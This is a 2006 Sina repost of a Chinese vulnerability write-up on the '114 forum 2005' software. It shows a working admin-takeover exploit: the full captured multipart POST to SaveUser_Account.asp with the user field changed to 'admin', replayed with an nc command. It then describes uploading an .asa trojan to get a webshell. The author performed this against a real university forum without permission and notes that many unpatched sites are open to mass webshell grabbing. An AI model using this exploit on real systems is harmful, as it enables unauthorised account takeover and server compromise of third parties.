科技时代新浪首页 > 科技时代 > 软件 > 正文

漏洞公布:114论坛2005正式版漏洞 (1)


http://www.sina.com.cn 2006年04月10日 05:29 赛迪网

  漏洞描述:

  网站114论坛 2005版正式

  /edituserdb.asp

  对提交数据和cooikes缺乏验证

  导致任意用户可以修改管理员密码

  默认后台admin/index.asp

  今天在旁注一个机房的机器时用了一下。

  http://www.***.net.cn/xzl/BBS/index.asp

  **医科大学网站上的一个论坛。

  注册了一个用户33221.

  然后跳转到 /edituserdb.asp,单击“修改注册”开始抓包!

  用记事本保存抓包内容如下:

  -----------------------------------------------------------------------------------------------------------

  POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

  Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

  Accept-Language: zh-cn

  Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

  Accept-Encoding: gzip, deflate

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

  Host: www.***.net.cn

  Content-Length: 2304

  Connection: Keep-Alive

  Cache-Control: no-cache

  Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserCode"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtConfirmPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtQuestion"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAnswer"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserName"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="selSex"

  先生

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtNick"

  11

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtProvince"

  111

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAddress"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPostCode"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTel"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtMobile"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtFax"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtEmail"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUrl"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtfile"; filename=""

  Content-Type: application/octet-stream

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtOicq"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtDocument"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="submit"

  修改注册信息

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtId"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTempId"

  -----------------------------7d61e41d605f6--

  -----------------------------------------------------------------------------------------------------------

  其中:“

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserCode"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtConfirmPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtQuestion"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAnswer"

  33221

  -----------------------------7d61e41d605f6

  ”

  修改第一个"33221"为“admin”保存11.txt文本为:

  POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1

  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*

  Referer: http://www.***.net.cn/xzl/BBS//edituserdb.asp

  Accept-Language: zh-cn

  Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6

  Accept-Encoding: gzip, deflate

  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)

  Host: www.***.net.cn

  Content-Length: 2304

  Connection: Keep-Alive

  Cache-Control: no-cache

  Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserCode"

  admin

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtConfirmPassword"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtQuestion"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAnswer"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUserName"

  33221

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="selSex"

  先生

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtNick"

  11

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtProvince"

  111

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtAddress"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtPostCode"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTel"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtMobile"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtFax"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtEmail"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtUrl"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtfile"; filename=""

  Content-Type: application/octet-stream

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtOicq"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtDocument"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="submit"

  修改注册信息

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtId"

  -----------------------------7d61e41d605f6

  Content-Disposition: form-data; name="txtTempId"

  -----------------------------7d61e41d605f6--

  这里因为我注册的用户名33221与admin长度一至,所以这里不用修改字节长度。

  然后用nc提交到服务器

  nc www.***.net.cn 80 <11.txt

  返回提示修改会员资料成功。

  然后用admin 密码为申请33221的密码一至登录。

  当然就是管理员权限了,然后登录后台,点击“修改栏目”,上传asa木马,ok,拿到webshll。

  看了一下,这个论坛系统还没有出补丁,可以拿大批webshell了,不过我只要了对我比较有用的一个服务器,其它的没有去抓了。

  (e129)

爱问(iAsk.com)



论坛】【收藏此页】【 】【多种方式看新闻】【下载点点通】【打印】【关闭




科技时代意见反馈留言板 电话:010-82628888-5595   欢迎批评指正

新浪简介 | About Sina | 广告服务 | 联系我们 | 招聘信息 | 网站律师 | SINA English | 会员注册 | 产品答疑

Copyright © 1996 - 2006 SINA Inc. All Rights Reserved

新浪公司 版权所有